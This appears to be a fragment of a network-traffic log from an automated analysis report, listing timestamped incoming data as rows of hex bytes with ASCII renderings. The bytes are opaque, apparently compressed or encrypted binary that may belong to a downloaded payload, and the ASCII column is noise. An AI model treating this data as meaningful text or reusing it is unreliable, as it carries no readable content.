                                                                                                                                                2022-09-29 12:51:20 UTC1121INData Raw: ec 70 20 ea c0 12 5f e1 f2 c0 af 3d f3 05 8f ef 69 21 e1 cf d1 7c 18 9b d4 f8 03 a2 23 df 57 95 9d 45 f9 e6 e8 f2 95 b9 2b 9a ed a4 b4 5e c8 04 94 00 d8 7c cc 0a 86 42 b4 15 1f df 8a 33 65 b1 7c 84 d9 77 b2 19 9b ca 06 46 97 30 55 4a 43 97 83 47 c9 5e 5c b5 7d af a7 c3 5f d9 ee 2c 4c b0 90 f6 d5 08 8e a3 c0 6f da 0d 7a 2e 02 db 93 57 2f d2 12 3f 45 b8 29 8c 58 fa f6 08 ef 92 03 51 52 7a 9b 73 e4 3c 5b 23 80 59 19 46 9e f5 40 96 e4 09 c8 02 cb 5f 15 f6 13 10 b8 76 85 79 f0 1d 9e ba 47 1f 31 a4 8e 20 a4 98 63 41 57 be 52 e8 74 5e 7a 7f d7 0d 9e b0 a5 f6 06 41 52 81 a8 ce 9c ea 70 f4 1a 20 ed d2 88 01 4d 9a aa c6 c4 69 d9 09 a6 45 ae 37 a2 24 76 19 dd 24 45 f1 c6 3f c1 ca 75 59 73 11 59 e1 56 e4 d0 1c cc 43 65 c4 17 d7 d4 c7 49 48 f8 69 ee 1e 25 4e 96 83 72
                                                                                                                                                Data Ascii: p _=i!|#WE+^|B3e|wF0UJCG^\}_,Loz.W/?E)XQRzs<[#YF@_vyG1 cAWRt^zARp MiE7$v$E?uYsYVCeIHi%Nr
                                                                                                                                                2022-09-29 12:51:20 UTC1122INData Raw: 55 fd 69 fe bf 20 83 be 4c a5 aa a7 62 29 fc 69 41 a5 d2 b9 e4 d0 08 3c 2d 1a 3b 02 73 39 88 c1 ae e1 29 95 97 42 09 84 6f 0d 06 11 24 82 ac 12 d3 39 3e 18 59 95 1e 30 ab 33 95 c1 15 65 c2 33 1e 3f 67 69 4b b2 19 db 58 09 42 81 2d 49 2c b7 8d 04 4d 32 c0 81 5e 66 81 f2 5b 1b 1b d4 f4 ed 87 60 9c a2 1d b3 1b 76 9b 42 6b c3 33 e7 b2 77 89 18 37 9b 7e 91 33 44 f6 a3 59 10 ce 66 79 14 ed 58 fb aa 46 45 fb 97 61 ca d6 0b 95 8b 06 b1 d6 3e 21 33 3b 82 28 a4 c1 95 f7 72 97 29 22 bf ed 9e 2a 4a 48 c1 e4 96 54 4a 23 a1 bd f9 39 de a1 8c 0f e2 62 f5 d3 fa 30 9e ba 36 c5 ea 3a a6 b1 5b 6b b4 5e 5a 0e 56 77 e7 e6 40 4f 81 63 f0 7b bb 8e a3 83 49 fe b5 d9 4d 2b 23 71 96 3a 02 4a d4 bc b1 85 a5 be b4 48 ed df 14 d5 c3 09 a9 51 3d f0 0b c8 49 e2 a3 db 81 a0 8e 7f 7c 52
                                                                                                                                                Data Ascii: Ui Lb)iA<-;s9)Bo$9>Y03e3?giKXB-I,M2^f[`vBk3w7~3DYfyXFEa>!3;(r)"*JHTJ#9b06:[k^ZVw@Oc{IM+#q:JHQ=I|R
                                                                                                                                                2022-09-29 12:51:20 UTC1123INData Raw: ee 93 ef cd 2b 61 96 54 02 33 f2 11 0b 65 07 c6 fd f2 43 3b 33 e3 4d 54 09 ee 54 d8 03 0e 2e 8e 89 0d 31 73 1a dc c9 d7 ab 7e 8d 8b 13 50 bc fc 49 cd 0d fe 20 5d e9 53 6b 8a e6 03 0a 5e b8 7f 01 aa 40 28 20 88 ce 05 85 8d 7d e9 78 74 f3 c7 c1 44 b9 60 b1 f0 bf 45 49 e9 33 3c 9d ab 65 cf 1e 73 84 9a d1 27 4e 3a 43 bb 46 1b c0 28 8e bb c6 b9 eb e0 e9 23 9a 39 82 f1 f3 1c e1 85 c0 3a e5 97 2e c2 69 af a2 b7 d2 05 09 7b 19 f3 29 46 5c d8 39 58 33 dc f4 dc ca 26 4f 88 93 fc fd 45 2c 01 10 ee a8 ae e6 5a c3 fc 06 19 96 38 0c 48 d1 b6 81 d4 81 0d e0 2b b5 53 98 55 5a e1 5a d9 87 af fb f8 51 98 3a 23 e1 75 70 91 a5 e8 62 27 97 d9 a9 2a 2b 75 62 50 80 4f 03 e7 f7 cf 53 d7 cf 7c f0 50 29 15 f1 44 c3 77 70 9d de af be 5e 2e 42 26 91 26 d6 60 fc 66 1b 3c b3 f7 e7 b1
                                                                                                                                                Data Ascii: +aT3eC;3MTT.1s~PI ]Sk^@( }xtD`EI3<es'N:CF(#9:.i{)F\9X3&OE,Z8H+SUZZQ:#upb'*+ubPOS|P)Dwp^.B&&`f<
                                                                                                                                                2022-09-29 12:51:20 UTC1125INData Raw: 30 43 ab 6d ae 09 49 eb 61 71 a1 a4 db 5c af 23 ac d2 7b 6e 50 17 e0 14 8c 35 84 d3 d3 14 cb 0e e3 96 e2 36 fa cf fe 0f 9b e2 e9 30 2f 36 5b 8f f4 26 71 41 b5 00 4f 1c 0d 49 2d a9 b6 10 b0 33 45 22 49 7a 12 27 c1 b2 a9 c8 4c 6c a3 8f 55 49 65 f4 db a4 bb e4 06 d1 5c 20 76 ac 8d 47 d4 61 26 c8 49 98 2f 90 e1 e2 1d 93 30 6f 88 3d 1e 29 73 81 c1 e4 51 1f 73 fa 24 c6 9d e8 be 1b 3a df 04 ce 8d b4 95 d7 5d e4 75 6d 48 b3 23 ad 8f 2a 5e f9 93 d3 4e dd 03 5c 4f 12 fd 3f 44 bf 79 0d 27 50 a0 31 a0 ee bd 5f e0 e8 4b 5d 12 1a a1 f1 88 73 92 89 a3 20 96 5b 9c cb c2 9c 9b ca 04 6a a5 d4 fd a1 58 42 92 95 b1 dd ca d2 bf 54 ad ec 95 8c 89 28 0f 97 78 87 1d c4 c2 d0 48 12 21 7a 38 94 b3 88 7a ec 75 a9 d2 84 be f7 45 74 e3 4b 85 f1 a5 50 4c 9e c5 4c 0b 10 34 2a df 04 76
                                                                                                                                                Data Ascii: 0CmIaq\#{nP560/6[&qAOI-3E"Iz'LlUIe\ vGa&I/0o=)sQs$:]umH#*^N\O?Dy'P1_K]s [jXBT(xH!z8zuEtKPLL4*v
                                                                                                                                                2022-09-29 12:51:20 UTC1126INData Raw: 83 73 b0 d0 97 e9 d5 91 20 a8 75 5f 89 ca c0 3c cb cf ab 92 02 48 cc 93 79 f7 7f ef 9d 0d 51 27 36 c9 1e f2 fb 33 34 45 da 34 ee df 72 6f 9d 6c 81 f8 0b 6a 90 64 b0 11 9d 8d a8 e4 5e f2 06 b8 e0 99 d8 ae 1c 53 3b 02 f4 9f 25 08 e5 2e fa 21 f7 55 ca 85 2d db 15 7e f6 63 79 45 25 73 55 34 60 f0 7d b7 be cc 99 24 b2 44 43 4e 7e d8 5a ea f2 07 f0 3f 89 fd e5 41 79 3c 2f 45 96 11 d5 a8 30 2f 48 16 65 e7 f5 0c 2f 27 a2 22 c3 bf 40 1e 20 82 ae d4 d7 26 c5 8e 0f 3e e8 08 d6 96 5a 53 ec 6a 12 25 ba 09 a0 f6 59 40 d6 23 85 b8 67 54 c8 2b 72 32 bc 3f d1 45 16 f8 58 bd 17 45 f7 db df c2 44 3d 9c bd 6d 39 d0 87 29 e5 42 f4 46 09 91 94 91 e2 49 92 1b 80 a2 69 b0 ca 5d d2 3c c6 e3 e0 9e bf 99 e7 4b 70 87 3f 1b a5 bd 8b 2d 51 e6 3c c1 95 e5 0e 7e 71 d7 20 64 4d c6 f9 e8
                                                                                                                                                Data Ascii: s u_<HyQ'634E4roljd^S;%.!U-~cyE%sU4`}$DCN~Z?Ay</E0/He/'"@ &>ZSj%Y@#gT+r2?EXED=m9)BFIi]<Kp?-Q<~q dM
                                                                                                                                                2022-09-29 12:51:20 UTC1127INData Raw: db 99 4f 7c b3 82 0a 49 3b b5 da ea 1c a7 f8 15 b3 46 4d 0d 18 0f 55 02 6e d7 57 f2 b8 ff 2e 63 8d 8d ee 59 32 6c fb a4 85 2a 97 e3 54 d7 1f f9 42 0b a3 26 a5 1d 2f b5 b1 90 2e c5 64 61 41 21 04 06 dd c3 6a 07 2e 44 4c 33 89 06 db 94 ba 19 d2 af 6b f5 5a c6 b3 4c 7b e1 46 66 92 45 8a fb cc e6 32 5e f3 88 3b 93 cf 42 a0 bd b2 2d 38 4b 16 3f 05 ff 17 89 25 57 d1 0f 85 92 c8 cf 67 02 ce 83 ab 62 17 7e 00 24 15 4e 7a 45 6b 50 d1 e6 72 01 f0 68 00 14 fb 10 8b 26 d8 d5 5d 2f 7b 2c aa 54 c3 a7 6e cf 57 82 46 9e 44 c8 a6 52 31 0d f6 51 e4 25 1b fc 26 4c ed 91 fe 93 c3 ab d8 fd 87 48 ee a6 e6 fa c1 40 bd c6 a3 5f b9 c3 44 84 99 31 79 3a 50 fe ef 2c 8a 39 e3 be 00 63 02 08 41 07 b0 0f 3f 6b 00 12 07 55 4b 18 c1 46 ad 37 9a aa 72 b9 0f cc a2 6d 7f f7 ae 5b cd 1f 7a
                                                                                                                                                Data Ascii: O|I;FMUnW.cY2l*TB&/.daA!j.DL3kZL{FfE2^;B-8K?%Wgb~$NzEkPrh&]/{,TnWFDR1Q%&LH@_D1y:P,9cA?kUKF7rm[z
                                                                                                                                                2022-09-29 12:51:20 UTC1129INData Raw: 2a 3d 20 1c b5 5d cf 26 11 d1 0d 35 1b 93 f3 6e c9 7c 21 ef 65 8b 5e b4 8e e3 af 0c 71 1e f9 75 e7 57 43 f5 c6 6c 79 16 e1 0c b8 7f 3c 93 34 a1 55 be 19 26 2c 21 d9 27 62 7e 87 18 c2 a2 c9 cb 02 9a ab 99 9c b8 ed 23 ef d4 93 0a fd 7f 85 37 4c 4c 3b 8a 1e 48 5b d6 3b 07 a9 fa 21 b6 ff 59 d1 f9 86 2f e3 e7 d5 3b 03 ed 5b ea 21 59 8d f8 c7 ed e3 f5 7e a8 4a 22 b1 e9 5a 52 fb b0 15 f2 49 92 ee 3e 3a 39 59 33 54 80 d1 74 4d 86 e0 d3 13 5e a9 bd 68 93 5f 8f 91 65 5e 69 bd 4e eb 14 b8 37 0d ca 26 02 cf 88 31 cb 07 a8 54 69 b2 5b 4f 9a a0 fd f5 75 a2 fa cb e8 1b b6 11 8c 15 ca 02 7d 9c 3d 6f 99 7d d5 41 61 d7 a6 76 09 08 da 83 05 64 34 a9 b2 4f d7 e4 8f e7 df 99 2e b6 61 cb 63 a3 0f d3 88 d5 44 ef 29 15 49 44 de c3 68 4d db db 5f bd 70 a1 63 d7 f8 b7 57 f8 86 f7
                                                                                                                                                Data Ascii: *= ]&5n|!e^quWCly<4U&,!'b~#7LL;H[;!Y/;[!Y~J"ZRI>:9Y3TtM^h_e^iN7&1Ti[Ou}=o}Aavd4O.acD)IDhM_pcW
                                                                                                                                                2022-09-29 12:51:20 UTC1130INData Raw: db a5 a1 d2 dc ed 13 11 30 ca 6e f3 e0 6e 3a 16 87 a6 7b 8d d4 bc 3d f7 e6 d5 0f fa e8 0f dd 1e 82 da 76 42 98 c5 99 ed 46 87 3d ec c2 7a a0 d7 ed f8 35 a7 3c de 27 f6 54 fa 5f 55 c1 28 62 c0 c0 e8 a6 f4 05 5d 4f e1 0e ba 5b af 05 fe f2 ef c2 be 8f 42 76 9f 9b fd b2 32 cc 0f 7e 83 3a 60 c8 7b f6 b2 00 70 05 1b c4 cc b2 4b e9 13 64 c2 62 0d da f1 1b 85 ad 5f bc 77 94 ca bf 51 da e7 0e 69 ae 4c 73 e1 65 98 be 6a 11 b2 ab 1e e7 d8 29 8b 43 8f 94 e8 08 63 91 a2 96 37 62 b9 ab e1 e7 82 59 2d ed d6 90 f3 a9 39 36 ae e7 53 08 f2 23 1b 12 f1 a8 b3 1c 2d 5f 2e ab 05 9e fc ce 70 10 8f c0 c2 95 aa c8 76 0f d2 08 31 29 93 ee 4e fb 4f a2 12 e8 3d b3 82 ed 71 55 93 3f 0e 26 18 d1 69 5d 7a 30 ee a0 8f 07 9d 9e d3 9e 44 3f c2 49 88 87 58 f8 4e 7a fc 3c 02 25 4e 4c 40 63
                                                                                                                                                Data Ascii: 0nn:{=vBF=z5<'T_U(b]O[Bv2~:`{pKdb_wQiLsej)Cc7bY-96S#-_.pv1)NO=qU?&i]z0D?IXNz<%NL@c
                                                                                                                                                2022-09-29 12:51:20 UTC1131INData Raw: c2 fd 4b ab b8 f6 1e b3 d2 d6 2a 5c 2e 3e 2c 8a 31 59 2a 4d 1a 11 3b cf 84 48 02 6c 98 09 92 ed e6 1c 1b b5 52 98 89 4b 9e 59 e3 7f ac d7 44 18 70 7c db 52 c8 85 f7 d4 85 21 e7 55 ed 88 17 5c 7d 29 20 86 fc 64 da 87 d9 0c 92 93 2c ee 5f 60 8a 8c f6 72 bf de 22 26 fc f2 e7 4c e3 cb 46 15 3d ae f0 e7 78 3d 5e c0 2e d8 9c 40 54 c7 47 b9 c3 a2 f8 79 d1 98 98 ad b7 e4 b0 b8 28 b2 fe d3 97 f5 db c3 bd 64 b0 f2 d6 95 13 4a 4f 7c 17 ea 8c 3f 55 ff af 14 f0 46 b4 80 de 6e bb d4 3c 08 f5 4a 15 b8 ca 56 17 f5 c7 6a e0 0c 76 5d 1d 4a b4 0c 71 0f 10 2d db 8b d3 bf 36 b4 ef ac 29 cf 3f 45 69 89 30 e5 18 72 d5 8b e5 83 be fc 73 3b e3 15 45 e7 7b 18 8a 65 31 ed b6 53 5a cd c5 3b cd 41 73 99 2d 3d 7f 12 45 2f df 4c 24 d8 4f c8 30 d2 d1 67 27 2a 73 71 33 44 55 99 e2 ae be
                                                                                                                                                Data Ascii: K*\.>,1Y*M;HlRKYDp|R!U\}) d,_`r"&LF=x=^.@TGy(dJO|?UFn<JVjv]Jq-6)?Ei0rs;E{e1SZ;As-=E/L$O0g'*sq3DU
                                                                                                                                                2022-09-29 12:51:20 UTC1132INData Raw: bc 3e 80 cd 10 4f 38 3c 5c 00 28 e6 7b 5a eb f0 8e b0 bb 58 f5 87 b4 fd 3d d8 41 59 0b df c3 79 fe 33 b8 e9 75 65 db 65 bc 89 ee 6d bc 15 24 13 b5 2b 44 ce b0 75 72 aa 99 44 23 7b e4 30 87 41 36 66 da 7b 6e c5 52 4e 99 61 df 03 41 de f8 55 55 80 a7 eb d7 19 f8 42 40 11 12 4d 4a a4 49 2d d8 b2 c6 83 5c d2 0b 1f 88 8c 4b 87 51 bb f9 57 23 07 32 e8 4b 55 24 7d a0 f9 5a 09 fd 6d c6 81 bd b7 28 ff 5e a3 8d 22 5a 93 94 e4 35 4e f5 21 6c e7 37 b6 07 f2 11 cc e7 43 c6 31 97 f8 3e f6 6c d2 78 a6 e6 0d 8c b2 3e 87 fb d3 bc e5 2a 45 c7 a7 83 09 f7 e2 6d 50 9b fa b2 37 fb bc 83 d0 b7 f2 f1 86 26 12 9b bc 84 03 87 dd fd 73 90 13 75 99 62 b7 00 e9 0d eb 11 41 b7 5d 7f fd d6 8d 95 55 b3 20 d0 2d f5 48 7f 62 cf b0 65 fb d5 6a d7 56 2d 27 54 ae 89 8d d4 f2 23 18 8b cf 74
                                                                                                                                                Data Ascii: >O8<\({ZX=AYy3ueem$+DurD#{0A6f{nRNaAUUB@MJI-\KQW#2KU$}Zm(^"Z5N!l7C1>lx>*EmP7&subA]U -HbejV-'T#t
                                                                                                                                                2022-09-29 12:51:20 UTC1133INData Raw: f7 15 13 cc b1 8e 0e af 76 fe ae df 0d c3 2e 25 9c 13 8f 01 6a 10 ed 8e 3a 98 53 55 31 df e6 39 9a 90 25 8d 2f 24 68 04 d7 5b 05 8c f6 70 ad d5 17 58 f5 50 56 67 59 37 28 4f e9 c2 fc 96 a5 70 03 8f 5c f1 e9 7f f3 56 57 c8 55 a0 2b 85 a5 16 c2 1e 47 d1 24 e0 84 ab 24 4e f0 1a a1 17 2a 98 4c 00 7d 44 51 7c d0 45 08 77 bb c9 b7 50 9e 3a 0f f3 a0 91 09 76 91 b3 b3 74 92 80 80 7e 0f 7c 5c 54 3e 13 47 76 73 08 24 47 80 cc 00 ca 0c 95 89 2e 39 0b 86 c8 d5 c9 1d 43 8e 69 ea 96 b6 2c 43 4f 8c 8f 61 62 f5 c1 66 8e cd 56 84 de 69 45 ef 93 77 33 58 fb 90 24 3c b2 a2 a3 48 77 b8 30 77 42 87 49 ee 6a a9 44 4c 8f 2e 69 e5 fe 81 84 59 a1 a2 32 42 f1 4e 4d 47 e9 3b 29 01 6c e7 c5 28 43 a8 c9 cd b7 18 16 59 7f a5 bc 8b 7b ad b9 99 f4 53 0f cb df be 4e ef 47 3b fa b1 02 97
                                                                                                                                                Data Ascii: v.%j:SU19%/$h[pXPVgY7(Op\VWU+G$$N*L}DQ|EwP:vt~|\T>Gvs$G.9Ci,COabfViEw3X$<Hw0wBIjDL.iY2BNMG;)l(CY{SNG;
                                                                                                                                                2022-09-29 12:51:20 UTC1134INData Raw: 25 10 c5 11 0e e5 8c aa fd 5c e8 14 d1 80 96 4e a7 2b 88 26 97 6b 61 62 0b 07 d0 cf 43 35 d3 e3 28 1d 84 00 62 39 8f 12 b5 f1 13 0e 83 c5 6c 65 95 9c 6f 56 29 2a c1 5c 67 a3 81 61 07 fb 85 51 15 b7 1d 2c b6 82 f4 98 af db 09 98 bf 51 85 ff 85 5a 79 9f b4 f4 2b 52 6c f6 48 da 56 1b 05 ea 9f 7b 17 40 05 f7 29 34 65 43 26 b3 86 72 8e 07 9b 70 b3 f3 1a 48 f2 66 e9 f1 d3 00 51 db 2f d1 cf d3 ed d4 5d fb 3e b6 09 88 c5 c2 e2 88 dd e1 a0 5f 05 32 07 b9 c2 ff ad a9 e5 fe fb ed 2f fb 79 26 aa 8c a4 57 f0 a9 67 8b f8 2b 89 36 4b 4c 78 2b 28 60 8e 7f 73 ee 24 9d 9d 33 ac ea 12 31 e3 b6 14 59 7e 7c 19 da 75 25 98 75 82 0e 3f e7 23 8d fc eb 96 cd 72 9a ca 4a 04 82 de ec 4f ad 49 45 47 11 d3 c9 13 2d 32 52 e2 72 e6 89 19 ee e7 0e 4f df 0a 47 c3 e3 78 39 d1 48 3c 4a 2b
                                                                                                                                                Data Ascii: %\N+&kabC5(b9leoV)*\gaQ,QZy+RlHV{@)4eC&rpHfQ/]>_2/y&Wg+6KLx+(`s$31Y~|u%u?#rJOIEG-2RrOGx9H<J+
                                                                                                                                                2022-09-29 12:51:20 UTC1136INData Raw: f3 42 b1 6c cc 06 b2 8b 70 4b 60 4c 44 f1 f2 16 7c 9a de 05 3e fb 45 ad df 8c 17 57 a6 29 e9 b7 d3 5f fe 74 e3 11 5b 19 0a aa 23 b8 99 a4 24 50 2d 04 97 14 96 88 da 8d ff f5 80 57 54 72 0d 6e 6d 77 31 eb ab 03 b6 24 67 39 7e 85 d2 4c a4 ae 63 77 1a 4a 7e 1d f3 7f a7 fb 3d 27 eb 86 7b d0 44 28 90 15 73 bf a6 ce 51 3e 75 25 8a 82 d0 71 25 b5 c2 08 69 66 9f b8 9a da 5b 22 c5 fe 17 98 a2 26 cd 31 18 f8 c6 1b 03 d3 82 5c 2a 9d c1 2d b8 d3 14 18 ee 3e 72 ee 1b 08 2f d8 d4 34 ae 21 9f 20 ed 5e 97 bc e7 76 6d b7 8d 70 a0 9a 84 34 19 d5 51 c7 bc 38 f0 97 41 6e ac 3e b8 1f 9e 96 b2 9a 86 d7 c7 b4 01 21 96 2c f8 a5 eb f8 4a ad 48 bb 88 ab 97 a5 f5 f6 83 29 2f 95 1d 0a 85 f9 97 33 d0 52 d9 b8 a1 be 3b 7b 0f fd ab 3b 4a 24 ab 58 10 d7 bb cc 8f 32 4a 5c d6 54 9f 68 c5
                                                                                                                                                Data Ascii: BlpK`LD|>EW)_t[#$P-WTrnmw1$g9~LcwJ~='{D(sQ>u%q%if["&1\*->r/4! ^vmp4Q8An>!,JH)/3R;{;J$X2J\Th
                                                                                                                                                2022-09-29 12:51:20 UTC1137INData Raw: d2 f4 0e 30 ed b6 48 d5 9f 86 c3 30 ef 5a d6 0b ea a9 67 bd 36 6e 66 fa d2 33 19 85 65 22 7a 16 00 25 7b ea 4e 69 ed eb 77 0a 5c 5b 91 a3 2f 25 fc 44 f8 d7 54 01 d3 9b 2f 1b 55 1e 51 dc 7f a6 cf a8 c6 5e 0a 8d 22 1e a4 73 13 60 d5 d5 d5 9a 96 b0 3e 70 0b 38 15 0b 2d 26 ac f8 35 a5 60 69 61 72 33 b4 01 19 9e 6d 2d 26 21 6d e1 90 6b 4c 90 3b 7d d6 92 9f fa 48 84 8e 6e bb 81 72 01 8b b0 07 73 bc fa 1f bf 50 4e d9 cd d0 99 0b dd 01 78 f1 fb db 4f 97 fc 4e 28 ba f2 96 e2 00 4f 7e a5 8b 0b 38 8f c4 5d 1e 76 d7 1c a3 e6 57 0d bf 69 8b 20 18 45 c4 79 9c 5c 6f 2f b1 9d 9e ac 2e 77 e9 12 bf d2 90 c5 47 af f5 24 18 7d 8e a8 2a 53 dd 1d 5a 54 71 42 74 f4 63 3a 52 c0 a9 53 69 47 b0 18 6d c6 14 41 39 64 4a 54 2e 90 1d be c9 a3 0a b7 c4 ef 23 43 e7 60 f0 b4 7c f1 dd ef
                                                                                                                                                Data Ascii: 0H0Zg6nf3e"z%{Niw\[/%DT/UQ^"s`>p8-&5`iar3m-&!mkL;}HnrsPNxON(O~8]vWi Ey\o/.wG$}*SZTqBtc:RSiGmA9dJT.#C`|
                                                                                                                                                2022-09-29 12:51:20 UTC1138INData Raw: 44 a2 79 96 31 00 2b 4a 38 3c b5 b7 00 1a 67 14 ad 5d 09 b2 98 03 0b b9 26 68 b0 fc 94 c8 01 2b 1e ca ba 1b 1d ee 73 31 52 8c 2e 6c 1d 78 dc 26 4d c7 a1 f3 fe 15 05 04 8f f1 bf a6 d0 cb f8 17 f6 e0 2c 50 c5 1b 09 22 12 f1 49 04 0a 0d 15 f7 01 e6 da bf d8 9a db fc cb 99 6f 87 bc a4 56 21 0f 60 a6 21 f9 ed 0c 0d 79 06 90 52 27 f2 26 20 5f 94 6e ba c1 58 89 d7 5e 2f a4 e9 40 83 8d 87 70 28 41 00 1f 75 01 24 95 1a ff 45 a7 a9 01 dc d7 9a 63 1d 9c e9 c7 e5 a8 c2 b7 ba 44 be aa 72 47 d0 0d b9 1b d5 b6 a0 1e 10 a2 bc 97 4b 34 b8 27 7e dd 55 c9 70 86 04 fd 24 57 b7 60 47 10 c7 d3 b0 24 e5 c4 b2 3d 72 d0 0e fd c6 72 29 0e d2 23 1f d5 d1 79 38 37 16 4e 25 64 4c 6f 17 13 c9 d3 8d 66 32 14 55 90 fa 39 15 a8 41 34 10 33 7e 45 f7 ac b4 56 7c 73 06 a7 35 a9 64 f8 ab f0
                                                                                                                                                Data Ascii: Dy1+J8<g]&h+s1R.lx&M,P"IoV!`!yR'& _nX^/@p(Au$EcDrGK4'~Up$W`G$=rr)#y87N%dLof2U9A43~EV|s5d
                                                                                                                                                2022-09-29 12:51:20 UTC1140INData Raw: 92 32 f9 12 c5 c6 1b d6 c2 7a 89 8b 3c 6b 2e 41 9a e6 17 8b 34 3b 3d f8 cb 49 02 b0 c1 94 ba 68 aa d1 38 4c 0e e6 13 0e c3 96 12 de 57 ab c9 62 e2 ad 42 4e 37 d8 76 17 cc 6a cc 37 5c 2a fe c9 67 eb f3 77 93 b4 f3 d0 16 1f af 52 8e d9 ec f8 96 40 94 a5 38 05 6e a8 68 15 ca fa 19 1c dc df 37 d1 92 1d ee 0d ba 78 8f b1 e2 73 73 ce 92 ef 56 5d 7f 98 0e d7 c0 39 a0 67 f2 2d 00 0c 05 66 4a 4d c4 51 1e bb c6 ef 5c 4f 4d ae b4 5c 4e a8 05 64 72 b3 fd 67 76 e6 1e 03 45 3d 1d 76 a2 b2 e6 38 88 f0 70 b0 85 19 b6 84 c2 84 bd bc 87 f1 96 ff 5f f9 93 fd e0 06 23 a1 ae 58 7d d3 8d 80 c0 f5 99 5a ce bd 01 6c 28 dd 82 8d 25 24 65 f9 10 af 8d 65 d5 23 2c f8 df 6c 3a a3 98 b2 08 3b 60 3a 1e 42 85 af a3 d0 4f 6a 97 03 da eb 3d 9b 3e 9d 3c 0b 4a f0 cc cc 5e 0f 6e 56 5d 52 9d
                                                                                                                                                Data Ascii: 2z<k.A4;=Ih8LWbBN7vj7\*gwR@8nh7xssV]9g-fJMQ\OM\NdrgvE=v8p_#X}Zl(%$ee#,l:;`:BOj=><J^nV]R
                                                                                                                                                2022-09-29 12:51:20 UTC1141INData Raw: cf a9 8c 1a 8a 76 3b 74 fc 87 46 48 22 e2 4d e5 26 ca 27 64 ec db 67 f1 c6 b8 17 44 f9 87 b4 df 45 72 1c 06 e2 03 75 b9 ee 15 e3 e3 b8 8c 1a 42 51 dc 28 02 49 98 95 54 57 04 fb 71 d3 62 84 a2 9e 68 b9 e1 dd 37 98 54 16 2c 6b cc 34 ad f8 c6 84 73 c0 38 3c c1 5e 91 f2 08 a2 f1 14 97 d4 6b 85 c5 8f 77 45 d9 19 5d 34 d7 3a 99 06 d4 26 66 29 fb 92 f1 33 21 0b 00 dd a3 36 30 41 e0 94 fa 3e d5 df a4 8b bf c2 69 e6 21 21 86 e8 26 84 be 86 04 9a 73 47 d8 9c 80 cf da 1b f9 c6 0c f4 2e 76 30 46 d5 77 ef 64 f0 5d d8 03 14 de 39 d3 d6 b0 57 16 b3 8c b8 64 fd b0 0d f1 79 39 b9 c4 a9 8a 81 ec 89 00 c2 50 b8 be e8 f6 ad a3 2c 85 30 e3 a4 6c 38 c7 f2 76 e0 9a 37 21 3f da 63 66 27 57 11 47 01 43 06 aa 61 20 92 16 6e 1a 2e 6c c5 d5 df 99 8d 17 d9 19 4c 74 c0 30 26 73 f8 04
                                                                                                                                                Data Ascii: v;tFH"M&'dgDEruBQ(ITWqbh7T,k4s8<^kwE]4:&f)3!60A>i!!&sG.v0Fwd]9Wdy9P,0l8v7!?cf'WGCa n.lLt0&s
                                                                                                                                                2022-09-29 12:51:20 UTC1143INData Raw: 47 6f fd 90 bf c9 d6 12 92 da c4 9b 49 0f 34 97 e0 c5 29 00 0d 61 3a 10 d9 ae 38 d5 c0 83 21 94 c3 9f 2c a1 ff d6 47 0e ae f5 ab ca 79 b7 48 fe 4b 80 e7 5f 1a 3f b5 bb 27 25 c5 a8 39 e8 93 87 b8 e6 83 40 42 fd 77 ed 36 a4 87 b0 28 c7 8c 43 ea 21 a2 4b f9 01 50 f8 ac 2c 18 f3 7e 62 ba 33 1c 51 ed 93 bb cd 4d d9 30 1f fd 33 62 4a 36 00 06 83 ff 76 17 be e0 3b 75 b0 64 2b 1a d3 52 67 82 a4 0c a1 43 16 fe 47 f6 83 e6 7f 01 d3 ae 1d c9 4f 57 32 9f 16 22 63 29 1b e8 b7 9b 72 71 60 e2 a9 85 e8 4b 0c c6 05 95 d2 92 fa 17 b7 49 b5 3d ed 14 80 33 34 9b 48 3d 27 6a 24 98 f0 b6 73 9b bd f8 ed 5d 3a 81 48 51 c1 16 5a 1f 53 6f 94 ab 2d dd 1a 70 8d 00 69 b3 61 bc a9 4c 14 74 f9 19 e6 20 07 f5 f4 6c 62 74 22 1a f2 25 d9 f5 7d dc 95 63 a1 88 87 f9 2b 76 7d 60 1d f6 21 fe
                                                                                                                                                Data Ascii: GoI4)a:8!,GyHK_?'%9@Bw6(C!KP,~b3QM03bJ6v;ud+RgCGOW2"c)rq`KI=34H='j$s]:HQZSo-piaLt lbt"%}c+v}`!
                                                                                                                                                2022-09-29 12:51:20 UTC1144INData Raw: 06 47 3e 3e d0 18 ff f9 6c 1a 22 3d 83 3d 1b d0 bd e4 3f de 4c a8 47 e6 ba ab 08 c0 56 bf f4 ef 65 f1 24 06 d2 9c 80 f8 a1 27 a1 d1 8f c5 db 16 de 68 e7 1f 5a 98 d4 c8 7d da e3 15 42 cd a4 fe c2 4a 6b c0 48 18 38 79 6a f1 40 15 46 1d ca 55 ae ed c6 0e 62 02 65 f1 c5 27 00 4b 33 ad 0f 9f a5 2a 48 36 e3 68 50 b9 f0 1c 4f a1 74 7a 5c 31 f9 8a 13 c9 8f df 2e 2d ff 36 7b 55 54 eb 4a 8c f0 f6 0f c0 04 ed ae f7 11 69 bf 00 bd 2a 4f 08 2e 2b ff 1e fa dd 8c bc df ad da 98 2d 1a af 8d dc 2d 5f 39 4c 96 13 67 c8 bf 7f 33 15 eb 83 b4 75 85 80 b4 96 bf fd 9a d4 4c c1 15 3a 74 ac 17 ac 3e 83 97 88 de ec 73 86 8e 2a ee 31 af ee e4 9e 43 f4 7c 9f 00 0a 2b 19 f7 d5 12 6d 15 16 4b fb 4f 62 8d e9 21 49 21 61 2a 06 99 d6 b0 cf 98 66 8d b6 d3 c8 e6 52 ee 71 16 40 c3 ab 46 60
                                                                                                                                                Data Ascii: G>>l"==?LGVe$'hZ}BJkH8yj@FUbe'K3*H6hPOtz\1.-6{UTJi*O.+--_9Lg3uL:t>s*1C|+mKOb!I!a*fRq@F`
